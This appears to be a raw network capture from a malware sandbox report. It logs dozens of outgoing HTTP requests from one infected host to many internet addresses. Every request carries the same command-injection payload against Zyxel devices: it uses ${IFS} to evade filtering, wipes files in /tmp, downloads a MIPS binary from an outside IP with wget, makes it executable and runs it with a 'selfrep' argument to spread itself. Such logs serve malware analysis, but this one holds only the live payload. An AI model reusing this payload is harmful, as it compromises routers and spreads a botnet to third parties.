                                                Jan 29, 2024 07:07:49.363332033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4550192.168.2.2337654194.80.221.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363378048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4551192.168.2.2354168114.129.19.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363413095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4552192.168.2.235510285.138.162.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363454103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4553192.168.2.234675295.165.5.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363502979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4554192.168.2.234804647.153.168.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363538027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4555192.168.2.2333882172.65.47.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363583088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4556192.168.2.2351434219.90.235.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363605976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4557192.168.2.233769442.17.92.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363647938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4558192.168.2.234916648.6.112.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363666058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4559192.168.2.2346452200.11.27.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363722086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4560192.168.2.2346686135.158.119.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363765955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4561192.168.2.2335502113.161.136.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363797903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4562192.168.2.235728412.56.179.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363845110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4563192.168.2.2344862116.90.108.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363876104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4564192.168.2.2356846217.246.190.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363936901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4565192.168.2.2347118158.12.239.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.363972902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4566192.168.2.234023219.227.44.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364005089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4567192.168.2.2336558168.235.162.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364053965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4568192.168.2.2336390109.48.96.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364094019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4569192.168.2.235584823.110.17.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364145041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4570192.168.2.2348278157.76.230.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364197969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4571192.168.2.2336940172.85.4.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364226103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4572192.168.2.235640252.250.88.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364252090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4573192.168.2.2354728150.187.178.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364275932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4574192.168.2.234454239.192.244.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364326000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4575192.168.2.2357638107.11.237.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364355087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4576192.168.2.2343136191.68.179.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364403009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4577192.168.2.2348324116.27.228.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364444017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4578192.168.2.2337516191.84.103.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364471912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4579192.168.2.234128677.191.220.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364512920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4580192.168.2.2353456107.159.175.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364569902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4581192.168.2.2355086136.68.40.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364598989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4582192.168.2.2348556207.234.126.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364631891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4583192.168.2.2349298131.21.164.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364692926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4584192.168.2.234613077.30.186.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364712954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4585192.168.2.233803280.136.244.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364756107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4586192.168.2.236060220.93.130.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364801884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4587192.168.2.233718634.16.192.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364837885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4588192.168.2.234521062.75.157.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364877939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4589192.168.2.233535670.19.38.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364911079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4590192.168.2.235620490.170.39.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364955902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4591192.168.2.2359140221.236.206.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.364986897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4592192.168.2.2350352213.172.163.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365030050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4593192.168.2.234637472.72.178.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365081072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4594192.168.2.235999827.18.7.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365113020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4595192.168.2.2338528113.70.24.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365149021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4596192.168.2.2339564176.155.141.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365200996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4597192.168.2.2357600180.65.165.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365233898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4598192.168.2.2353372149.3.133.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365257025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4599192.168.2.235435823.239.95.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365312099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4600192.168.2.2341236108.169.191.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365359068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4601192.168.2.2356282153.31.237.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365401983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4602192.168.2.234717418.69.50.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365427017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4603192.168.2.235418035.203.173.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365468025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4604192.168.2.2352424106.115.133.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365510941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4605192.168.2.2337362107.205.95.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365550041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4606192.168.2.235086679.29.79.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365598917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4607192.168.2.23346182.95.14.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365684032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4608192.168.2.2344398222.27.232.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365734100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4609192.168.2.234963620.157.225.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365763903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4610192.168.2.235601035.44.138.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365811110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4611192.168.2.2346088132.246.173.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365849972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4612192.168.2.236092094.24.166.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.365906000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4613192.168.2.2339440105.9.197.96443
                                                TimestampBytes transferredDirectionData
